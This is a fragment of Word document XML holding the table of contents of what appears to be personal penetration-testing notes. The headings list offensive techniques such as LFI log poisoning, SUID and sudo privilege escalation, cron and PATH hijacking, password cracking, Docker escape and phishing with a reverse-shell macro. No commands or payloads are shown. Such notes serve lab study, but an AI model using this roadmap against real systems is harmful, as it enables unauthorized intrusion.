              <w:t xml:space="preserve">308</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xf6d70ba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blocked due to automated bruteforce</w:t>
              <w:tab/>
              <w:t xml:space="preserve">309</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xd07t7aq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Bruteforce:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">309</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kcew8s3w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 User-Defined Function (UDF) priv esc for version ⅘</w:t>
              <w:tab/>
              <w:t xml:space="preserve">310</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z0h2fued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 commands</w:t>
              <w:tab/>
              <w:t xml:space="preserve">311</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r5f4s0nzr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Postgresql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">313</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1jq28ltbs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from PostgreSQL</w:t>
              <w:tab/>
              <w:t xml:space="preserve">314</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atb2cxre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314</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7tl24r61ao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MongoDB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">315</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nkbcgjz8a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view .db files using sqlitebrowser (GUI)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">317</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e2lfj23vxr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sqlite3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">317</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oz7tx8s337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Dbeaver</w:t>
              <w:tab/>
              <w:t xml:space="preserve">318</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djharlud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connect to mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">321</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reijkki75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S3 (Amazon Simple Storage Service)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">324</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ievyyu2c4l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WinRM (Windows Remote Manager)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">327</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cram47f0kl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LFI and RFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">327</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38mpqcyc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LFI vs. Directory Traversal</w:t>
              <w:tab/>
              <w:t xml:space="preserve">327</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dnibm5l03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Responder (Tier 2 Starting Point HTB)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">328</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0zvdj3piq7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RFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">328</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58l5jdwkfi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LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">331</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e9ejkfgx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to do once you have LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">333</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f9j5ppig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Comprehensive LFI List</w:t>
              <w:tab/>
              <w:t xml:space="preserve">334</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o02y40xb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LFI Tricks</w:t>
              <w:tab/>
              <w:t xml:space="preserve">335</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jdh9t8iq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Bypassing PHP Assertions</w:t>
              <w:tab/>
              <w:t xml:space="preserve">335</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m9gxdaxy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Encoding Special Characters (and Apache httpd 2.4.49 exploit)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">336</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r61fk3r1e6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Log Poisoning via LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">338</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ockyiwfp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auth.log</w:t>
              <w:tab/>
              <w:t xml:space="preserve">339</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ona1s0h7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access.log</w:t>
              <w:tab/>
              <w:t xml:space="preserve">342</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fp2fnkdwx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Bypassing file extension filters</w:t>
              <w:tab/>
              <w:t xml:space="preserve">348</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py8vu27jg7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John The Ripper</w:t>
              <w:tab/>
              <w:t xml:space="preserve">350</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dl5rlby8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350</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h01aga8k1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/etc/passwd and /etc/shadow files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">351</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7igz5r9t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Encrypted ZIP Files (ZIP files with passwords)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">352</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937knob1f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ZIP files using fcrackzip</w:t>
              <w:tab/>
              <w:t xml:space="preserve">352</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3ou8gbt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ZIP files using zip2john (from Vaccine HTB):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">352</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7miwicyce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PDF files with passwords</w:t>
              <w:tab/>
              <w:t xml:space="preserve">353</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z1q05a37zj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HashCat and Hashid</w:t>
              <w:tab/>
              <w:t xml:space="preserve">354</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1oc37mjz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the mode needed for a hash</w:t>
              <w:tab/>
              <w:t xml:space="preserve">354</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buy90mcvw0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John the Ripper vs. Hashcat</w:t>
              <w:tab/>
              <w:t xml:space="preserve">356</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307vitdame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Hashing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">356</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u0oqky55w3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lxd group</w:t>
              <w:tab/>
              <w:t xml:space="preserve">357</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p8t9kmi4jm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Docker</w:t>
              <w:tab/>
              <w:t xml:space="preserve">357</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ptxgmbuo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Root from users in Docker Group</w:t>
              <w:tab/>
              <w:t xml:space="preserve">358</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tcko022jm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tell if you are currently inside of a Docker container instead of an actual machine and how to escape using ligolo</w:t>
              <w:tab/>
              <w:t xml:space="preserve">359</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idf4f9xxs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GTFOBins / Binary (Unix Binaries)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">361</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cwumehmcf3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exploits</w:t>
              <w:tab/>
              <w:t xml:space="preserve">362</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4qbyfaghz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Apache2 Configuration file (/bin/systemctl * apache2)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">362</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u0qnfqj1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Apache2 (/usr/sbin/apache2)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">365</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j8d46m1x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teehee (/usr/bin/teehee)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">366</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4bvkdbrz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hping3 (/usr/bin/hping3)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">367</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te758z32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SUID bit for /usr/sbin/hping3 is also set:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">367</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vci0brfv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SUID bit for /usr/sbin/hping3 is NOT set:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">367</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3hlyd8sc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/sbin/shutdown and /usr/bin/check-system</w:t>
              <w:tab/>
              <w:t xml:space="preserve">369</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0phz9sd8n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Borg (/usr/bin/borg)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">370</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nqz3wdljg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/usr/bin/composer</w:t>
              <w:tab/>
              <w:t xml:space="preserve">372</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eioe15l8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/usr/bin/systemctl</w:t>
              <w:tab/>
              <w:t xml:space="preserve">373</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5t3pc2hp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/usr/bin/make</w:t>
              <w:tab/>
              <w:t xml:space="preserve">375</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qjfdomoe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/use/bin/flask_password_changer</w:t>
              <w:tab/>
              <w:t xml:space="preserve">376</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4dqbeybl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/usr/bin/web-scraper</w:t>
              <w:tab/>
              <w:t xml:space="preserve">377</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48qesdz6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/usr/bin/rsync</w:t>
              <w:tab/>
              <w:t xml:space="preserve">378</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mqme7yc5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/bin/systemctl restart spiderbackup.service and /bin/systemctl daemon-reload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">379</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xrn0pphd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/usr/bin/mail</w:t>
              <w:tab/>
              <w:t xml:space="preserve">380</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039p6o4j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/usr/bin/docker</w:t>
              <w:tab/>
              <w:t xml:space="preserve">381</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lwswxgzx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/usr/bin/gcore</w:t>
              <w:tab/>
              <w:t xml:space="preserve">382</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529t39a1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/usr/bin/cpulimit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">383</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w0b5ouox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/usr/bin/ln</w:t>
              <w:tab/>
              <w:t xml:space="preserve">383</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i0wf5w0t0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Sudo Token Inject</w:t>
              <w:tab/>
              <w:t xml:space="preserve">383</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fldleadglq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SUID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">384</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uh6u7i1p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SUID files/binaries</w:t>
              <w:tab/>
              <w:t xml:space="preserve">387</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a3r1sy3b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 out common SUID binaries</w:t>
              <w:tab/>
              <w:t xml:space="preserve">387</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wd2ukzce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quickly check if something is in GTFOBins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">388</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cx2eipua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/bin/bash with SUID bit set</w:t>
              <w:tab/>
              <w:t xml:space="preserve">388</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svq585il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Shared Object Injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">388</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i544g0ip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PATH Environment Variable</w:t>
              <w:tab/>
              <w:t xml:space="preserve">389</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08wu3pgn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Shell Features (#1)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">391</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8h1ybv0rm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Shell Features (#2)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">392</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5idqaetrvi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SUID attacks from GTFOBins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">393</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zv2kj648o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/usr/bin/find</w:t>
              <w:tab/>
              <w:t xml:space="preserve">394</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cl6nekgv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/usr/bin/vim</w:t>
              <w:tab/>
              <w:t xml:space="preserve">394</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iv14e6b1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/usr/bin/dosbox</w:t>
              <w:tab/>
              <w:t xml:space="preserve">394</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wv0t3ggd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/usr/sbin/start-stop-daemon</w:t>
              <w:tab/>
              <w:t xml:space="preserve">395</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4tq1mid3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/usr/bin/php7.4 (but any version works)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">395</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13j33ow90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/usr/bin/wget</w:t>
              <w:tab/>
              <w:t xml:space="preserve">396</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m5cmte5w87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SUID attacks not in GTFOBins or need more context</w:t>
              <w:tab/>
              <w:t xml:space="preserve">398</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1dogch7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doas (/usr/local/bin/doas)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">399</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53kmj1ud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screen-4.5.0 with SUID bit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">402</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73j617mo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exim-4.84-3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">403</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p68pab8t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aria2c (/usr/bin/aria2c)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">403</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zm8970gq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/usr/bin/status</w:t>
              <w:tab/>
              <w:t xml:space="preserve">404</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qphf8f4p8b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SGID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">404</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m6db4o8cc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-l</w:t>
              <w:tab/>
              <w:t xml:space="preserve">405</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l2mzjyo2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LD_PRELOAD (environment variable)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">407</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xvbt12sz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LD_Library_PATH (environment variable)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">410</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b2attotb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root shell if a file from sudo -l doesn't exist or you can overwrite it</w:t>
              <w:tab/>
              <w:t xml:space="preserve">411</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fq1sasegyz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Capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">412</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3u81t5h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Capabilities explanation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">412</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fywprxlcn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Capabilities enumeration and exploitation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">414</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2v5sn4ns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exploit capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">416</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67prv7aa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python capabilities</w:t>
              <w:tab/>
              <w:t xml:space="preserve">418</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sxws92cycq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Cron Jobs</w:t>
              <w:tab/>
              <w:t xml:space="preserve">419</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w4k8qm2c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 Jobs info</w:t>
              <w:tab/>
              <w:t xml:space="preserve">420</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n8dqqfbh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PATH variable for unspecified absolute paths to executables ran by cron</w:t>
              <w:tab/>
              <w:t xml:space="preserve">420</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sm8fnk1t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 Job Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">421</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cii6z5dw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structure of /etc/crontab</w:t>
              <w:tab/>
              <w:t xml:space="preserve">423</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0qj8tdhf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cron jobs</w:t>
              <w:tab/>
              <w:t xml:space="preserve">424</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2h7evnnr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Replacing a file being run as root using bash (found via pspy64)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">427</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gbyzxqp8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Putting malicious file in PATH with high priority (/usr/bin/local)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">428</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2c4y6uh5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malicious missing .so file by putting in directory that is part of LD_LIBRARY_PATH path</w:t>
              <w:tab/>
              <w:t xml:space="preserve">430</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07b5qjsh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7zip wildcard PE</w:t>
              <w:tab/>
              <w:t xml:space="preserve">435</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vfkyewr45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Bash Gobbling or Linux tar wildcard (globbing)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">436</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8t2grxev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Example1 of Bash Gobbling or Linux tar wildcard</w:t>
              <w:tab/>
              <w:t xml:space="preserve">439</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4wh2izqb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Example2 of Bash gobbling or Linux tar wildcard (with SUDO) (/usr/bin/tar)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">441</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kusyqm6v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Example3 of Bash gobbling or Linux tar wildcard</w:t>
              <w:tab/>
              <w:t xml:space="preserve">441</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i2o9p87ft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 of files ran by cron jobs (to help build intuition for identifying them)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">445</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x92539ms9b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directory to my path on Kali</w:t>
              <w:tab/>
              <w:t xml:space="preserve">446</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nemcjhizu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Permanently:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">446</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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aagdzcks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Temporarily:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">446</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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ygci8556ve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PATH environment</w:t>
              <w:tab/>
              <w:t xml:space="preserve">447</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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eu1yx552ce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PATH environment variable hijacking</w:t>
              <w:tab/>
              <w:t xml:space="preserve">447</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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mofjim6j3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tell if a binary/command is hijackable</w:t>
              <w:tab/>
              <w:t xml:space="preserve">447</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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5vuh9iya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example with custom script (with SUID bit set) calling chpasswd but without full path</w:t>
              <w:tab/>
              <w:t xml:space="preserve">448</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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r25cl151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example with root cron job calling whoami without full path</w:t>
              <w:tab/>
              <w:t xml:space="preserve">450</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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tcgqzlly8n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check environment variables</w:t>
              <w:tab/>
              <w:t xml:space="preserve">452</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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rjm5tyeypl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Phishing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">453</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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438rotc6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Phishing Attack Example</w:t>
              <w:tab/>
              <w:t xml:space="preserve">453</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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pk2rx7x4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Prerequisites for this phishing attack</w:t>
              <w:tab/>
              <w:t xml:space="preserve">457</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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u9g7wd60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Webadv explained</w:t>
              <w:tab/>
              <w:t xml:space="preserve">460</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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i37hc4e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phishing example (with malicious ODS file containing a macro for a reverse shell)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">462</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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qx3k1hl13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phishing example (sending email with keywords and putting our http://&lt;IP&gt; in email)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">462</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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a4puqout91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SMTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">464</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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po9xv1ycx6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POP3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">467</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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xjbcgormmk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IMAP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">469</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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amnm9su6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Dealing with multiple mailboxes/folders and sub folders</w:t>
              <w:tab/>
              <w:t xml:space="preserve">472</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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250q8ytwjl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POP3, IMAP, and SMTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">472</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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k7rrv8jb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Explaining Each</w:t>
              <w:tab/>
              <w:t xml:space="preserve">473</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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hr2y9luau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is a guide below on how to read mail (via IMAP port 143) using telnet</w:t>
              <w:tab/>
              <w:t xml:space="preserve">475</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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p34kouyt0e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Mail</w:t>
              <w:tab/>
              <w:t xml:space="preserve">477</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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x5mrasxotv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Nmap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">478</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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dhtusxeky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IP of target machine (using netdiscover)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">481</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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s7ktu12bpk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Redis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">482</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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4s83kelu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 Exploit Example 1</w:t>
              <w:tab/>
              <w:t xml:space="preserve">483</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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orejl15ud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 Exploit Example 2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">484</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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uj3g7y7w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 Exploit Example 3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">484</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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0qbzusr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TFTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">486</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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7d1exrqh00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Curl</w:t>
              <w:tab/>
              <w:t xml:space="preserve">487</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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omrfu1wl49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Enum4Linux (external enumeration tool)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">488</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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dj1xoj5t9x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General Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">488</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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frxhkmlmvd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 Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">489</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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cy07ruiij2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Firewall enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">490</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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qaushfija2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 Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">491</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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fk0d8e0ec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Version of software on website</w:t>
              <w:tab/>
              <w:t xml:space="preserve">491</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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jjy5ypewz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Searchsploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">492</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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6h2l1g7q2m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Scheduled Tasks (Cron) Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">494</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
